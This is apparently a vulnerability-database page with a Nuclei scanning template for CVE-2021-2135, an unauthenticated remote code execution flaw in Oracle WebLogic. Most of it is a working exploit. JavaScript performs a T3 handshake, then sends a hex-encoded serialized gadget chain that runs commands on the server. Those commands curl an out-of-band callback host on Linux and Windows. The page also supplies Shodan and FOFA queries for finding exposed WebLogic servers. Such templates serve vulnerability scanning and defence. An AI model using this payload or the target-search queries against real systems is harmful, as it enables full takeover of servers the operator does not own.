漏洞描述
Oracle WebLogic Server (12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0) contains a remote code execution caused by unauthenticated access via T3, IIOP, letting attackers take over the server, exploit requires network access.
CVE-2021-2135: Oracle WebLogic Server - Remote Code Execution
PoC代码[已公开]
id: CVE-2021-2135
info:
name: Oracle WebLogic Server - Remote Code Execution
author: hnd3884
severity: critical
description: |
Oracle WebLogic Server (12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0) contains a remote code execution caused by unauthenticated access via T3, IIOP, letting attackers take over the server, exploit requires network access.
impact: |
Attackers can fully compromise the server, leading to data breach, service disruption, and potential further exploitation.
remediation: |
Update to the latest patched version of Oracle WebLogic Server.
reference:
- https://www.oracle.com/security-alerts/cpuapr2021.html
- https://x-f1v3.github.io/blog/1626153074926.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-2135
epss-score: 0.7228
epss-percentile: 0.9869
cwe-id: CWE-502
cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: oracle
product: weblogic_server
shodan-query:
- cpe:"cpe:2.3:a:oracle:weblogic_server"
- product:"WebLogic"
- http.server:"WebLogic"
- port:7001
fofa-query: product="WebLogic" || header="WebLogic Server"
tags: cve,cve2021,weblogic,oracle,rce,vkev
javascript:
- pre-condition: |
isPortOpen(Host,Port);
code: |
const net = require('nuclei/net');
const address = Host + ":" + Port;
const CMD_LINUX = "curl http://rce-linux-host." + oast;
const CMD_WIN = "cmd.exe /c powershell curl http://rce-window-host." + oast;
function decimalToFixedBytes(num, byteLength = 2) {
const arr = new Uint8Array(byteLength);
for (let i = byteLength - 1; i >= 0; i--) {
arr[i] = num & 0xFF;
num = num >> 8;
}
return arr;
}
function buildLengthHex(hexStr, cmdLinux) {
var num = parseInt(hexStr, 16);
var value = num + cmdLinux.length - 19;
var buf = bytes.Buffer();
buf.Write(decimalToFixedBytes(value));
return buf.Hex();
}
function buildLengthHex2(hexStr, cmdLinux) {
var num = parseInt(hexStr, 16);
var value = num + cmdLinux.length - 90;
var buf = bytes.Buffer();
buf.Write(decimalToFixedBytes(value));
return buf.Hex();
}
function stringToHex(str) {
var buf = bytes.Buffer();
buf.WriteString(str);
return buf.Hex();
}
function sendExploit(payload) {
s1 = net.Open('tcp', address);
s1.SendHex("743320372e302e302e300a41533a31300a484c3a31390a0a");
s1.Recv(4096);
s1.SendHex(payload);
}
sample = "00000486086501ffffffffffffffff00000000041000aced00057372002e636f6d2e74616e676f736f6c2e636f686572656e63652e736572766c65742e417474726962757465486f6c646572cc30a4783def6ac10c000078707a0000016f400a2d636f6d2e74616e676f736f6c2e7574696c2e70726f636573736f722e436f6e646974696f6e616c507574416c6c0a27636f6d2e74616e676f736f6c2e7574696c2e66696c7465722e4d61704576656e7446696c7465720000000000020a2c636f6d2e74616e676f736f6c2e696e7465726e616c2e7574696c2e53696d706c6542696e617279456e74727907000000d30a39636f6d2e74616e676f736f6c2e7574696c2e61676772656761746f722e546f704e41676772656761746f72245061727469616c526573756c740a38636f6d2e74616e676f736f6c2e636f686572656e63652e726573742e7574696c2e657874726163746f722e4d76656c457874726163746f720000000091016a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632822636d642e657865202f632063616c632e65786522293b72657475726e206e657720496e74656765722831293b020000000101010700000002010001010b73720031636f6d2e73756e2e6f72672e6170616368652e78706174682e696e7465726e616c2e6f626a656374732e58537472696e671c0a273b4816c5fd02000078720031636f6d2e73756e2e6f72672e6170616368652e78706174682e696e7465726e616c2e6f626a656374732e584f626a656374f4981209bb7bb6190200014c00056d5f6f626a7400124c6a6176612f6c616e672f4f626a6563743b7872002c636f6d2e73756e2e6f72672e6170616368652e78706174682e696e7465726e616c2e45787072657373696f6e07d9a61c8dacacd60200014c00086d5f706172656e747400324c636f6d2f73756e2f6f72672f6170616368652f78706174682f696e7465726e616c2f45787072657373696f6e4e6f64653b7870707077050102000000781000aced0005737200307765626c6f6769632e73656375726974792e61636c2e696e7465726e616c2e41757468656e74696361746564557365725cf8e9684f73eb7b0200074900096c6f63616c506f7274420003716f734a000974696d655374616d704c000b696e6574416464726573737400164c6a6176612f6e65742f496e6574416464726573733b4c000c6c6f63616c4164647265737371007e00014c00046e616d657400124c6a6176612f6c616e672f537472696e673b5b00097369676e61747572657400025b427870ffffffff650000019af1762bd070707400087765626c6f676963757200025b42acf317f8060854e0020000787000000010fef0048c9180baa747c69effdef421f41000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771c01000000000000000100093132372e302e302e3183b5795200000000781000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707711000000000000000001000000000000000078";
// payload
payload_linux = sample.replace("636d642e657865202f632063616c632e657865", stringToHex(CMD_LINUX)).replace('0486', buildLengthHex('0486', CMD_LINUX)).replace('016f', buildLengthHex('016f', CMD_LINUX)).replace('00d3', buildLengthHex('00d3', CMD_LINUX)).replace('0091', buildLengthHex('0091', CMD_LINUX));
payload_win = sample.replace("636d642e657865202f632063616c632e657865", stringToHex(CMD_WIN)).replace('0486', buildLengthHex('0486', CMD_WIN)).replace('016f', buildLengthHex('016f', CMD_WIN)).replace('00d3', buildLengthHex('00d3', CMD_WIN)).replace('009101', buildLengthHex2('0098', CMD_WIN) + '02');
// send exploit
sendExploit(payload_linux)
sendExploit(payload_win)
args:
Host: "{{Host}}"
Port: "7001"
oast: "{{interactsh-url}}"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- type: word
part: interactsh_request
words:
- "rce-linux"
- "rce-window"
condition: or
extractors:
- type: regex
part: interactsh_request
regex:
- 'rce-(linux|window)[^\s]*'
# digest: 4a0a00473045022100eb307ae6d2dfa8e7f03005f23be7c69b5fd5be2ca4c8ba9491c76a32fe3d600902204ab5b123b79b49c6251211e1a6b92cc0ce4b356b237028a774e7c0c00c63849c:922c64590222798bb761d5b6d8e72950